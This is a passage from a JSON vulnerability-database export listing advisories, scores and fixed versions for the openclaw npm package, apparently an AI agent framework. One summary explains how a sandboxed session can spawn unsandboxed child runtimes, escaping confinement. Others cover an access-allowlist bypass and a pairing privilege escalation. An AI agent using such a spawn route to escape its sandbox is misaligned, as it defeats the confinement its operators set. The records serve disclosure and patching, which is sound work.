issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43534","reference_id":"","reference_type":"","scores":[{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.05997","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00023","scoring_system":"epss","scoring_elements":"0.06623","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00023","scoring_system":"epss","scoring_elements":"0.06635","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43534"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e3a845bde5b54f4f1e742d0a51ba9860f9619b29","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-06T14:12:17Z/"}],"url":"https://github.com/openclaw/openclaw/commit/e3a845bde5b54f4f1e742d0a51ba9860f9619b29"},{"reference_url":"https://github.com/openclaw/openclaw/pull/64372","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/64372"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7g8c-cfr3-vqqr","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-06T14:12:17Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7g8c-cfr3-vqqr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43534","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43534"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unsanitized-external-input-in-agent-hook-events","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-06T14:12:17Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unsanitized-external-input-in-agent-hook-events"},{"reference_url":"https://github.com/advisories/GHSA-7g8c-cfr3-vqqr","reference_id":"GHSA-7g8c-cfr3-vqqr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7g8c-cfr3-vqqr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["CVE-2026-43534","GHSA-7g8c-cfr3-vqqr"],"risk_score":4.2,"exploitability":"0.5","weighted_severity":"8.4","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zg68-u5b5-vkft"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91472?format=json","vulnerability_id":"VCID-zhpy-h2b2-ekd8","summary":"Duplicate Advisory: OpenClaw's sandboxed sessions_spawn now enforces sandbox inheritance for cross-agent spawns\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-p7gr-f84w-hqg5. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.3.1 fail to enforce sandbox inheritance during cross-agent sessions_spawn operations, allowing sandboxed sessions to create child processes under unsandboxed agents. An attacker with a sandboxed session can exploit this to spawn child runtimes with sandbox.mode set to off, bypassing runtime confinement restrictions.","references":[{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-cross-agent-sessions-spawn","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-cross-agent-sessions-spawn"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32048","reference_id":"CVE-2026-32048","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32048"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-p7gr-f84w-hqg5","reference_id":"GHSA-p7gr-f84w-hqg5","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-p7gr-f84w-hqg5"},{"reference_url":"https://github.com/advisories/GHSA-wr92-6w3g-2hwc","reference_id":"GHSA-wr92-6w3g-2hwc","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wr92-6w3g-2hwc"}],"fixed_packages":[],"aliases":["GHSA-wr92-6w3g-2hwc"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zhpy-h2b2-ekd8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89363?format=json","vulnerability_id":"VCID-zkum-rn42-yyfs","summary":"OpenClaw: Discord voice manager bypasses channel-level member access allowlist\n## Summary\nDiscord voice manager bypasses channel-level member access allowlist\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: v2026.3.28 still accepts Discord voice ingress before channel allowlist authorization, and main-only gating means this remains a real shipped access-control bug.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `dba96e7507e0900f120e5e28e57755d69bf78759` — 2026-03-31T21:29:13+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zsxsoft for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41381","reference_id":"","reference_type":"","scores":[{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10395","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10436","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10417","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41381"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/dba96e7507e0900f120e5e28e57755d69bf78759","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:29:48Z/"}],"url":"https://github.com/openclaw/openclaw/commit/dba96e7507e0900f120e5e28e57755d69bf78759"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cqgw-44wg-44rf","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:29:48Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cqgw-44wg-44rf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41381","reference_id":"CVE-2026-41381","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41381"},{"reference_url":"https://github.com/advisories/GHSA-cqgw-44wg-44rf","reference_id":"GHSA-cqgw-44wg-44rf","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cqgw-44wg-44rf"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-access-control-bypass-in-discord-voice-manager-via-channel-allowlist","reference_id":"openclaw-access-control-bypass-in-discord-voice-manager-via-channel-allowlist","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:29:48Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-access-control-bypass-in-discord-voice-manager-via-channel-allowlist"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41381","GHSA-cqgw-44wg-44rf"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zkum-rn42-yyfs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89142?format=json","vulnerability_id":"VCID-zpb1-e3g9-vkbh","summary":"OpenClaw: Unbound bootstrap setup codes allow privilege escalation during pairing\n## Summary\nBootstrap setup codes were not bound to the intended device role and scopes, allowing first-use privilege escalation during pairing.\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Real first-use bootstrap privilege-escalation bug fixed and shipped in v2026.3.22+, so keep open for publication with current severity.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.13-1`\n- Patched versions: `>= 2026.3.22`\n- First stable tag containing the fix: `v2026.3.22`\n\n## Fix Commit(s)\n- `a600c72ed7d0045a27f58bf031d2b36ecb0141c9` — 2026-03-22T23:57:15-07:00\n\nOpenClaw thanks @tdjackey for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41386","reference_id":"","reference_type":"","scores":[{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.1385","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13886","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13882","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41386"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a600c72ed7d0045a27f58bf031d2b36ecb0141c9","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:H/SA:N"},{"value":"9.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:48:41Z/"}],"url":"https://github.com/openclaw/openclaw/commit/a600c72ed7d0045a27f58bf031d2b36ecb0141c9"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-gg9v-mgcp-v6m7","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:H/SA:N"},{"value":"9.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:48:41Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-gg9v-mgcp-v6m7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41386","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41386"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-unbound-bootstrap-setup-codes","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:H/SA:N"},{"value":"9.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:48:41Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-unbound-bootstrap-setup-codes"},{"reference_url":"https://github.com/advisories/GHSA-gg9v-mgcp-v6m7","reference_id":"GHSA-gg9v-